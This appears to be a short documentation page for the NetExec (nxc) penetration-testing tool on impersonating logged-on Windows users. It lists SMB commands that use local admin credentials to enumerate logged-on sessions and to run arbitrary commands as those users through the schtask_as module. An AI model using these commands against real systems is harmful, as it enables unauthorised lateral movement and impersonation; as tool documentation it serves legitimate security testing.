Impersonate logged-on Users
Use Sessions from logged-on Users to execute arbitrary commands using schtask_as
1. Enumerate logged-on users on your Target
nxc smb <ip> -u <localAdmin> -p <password> --loggedon-usersnxc smb <ip> -u <localAdmin> -p <password> --qwinsta2. Execute commands on behalf of other users
nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
Module options:
Last updated
Was this helpful?

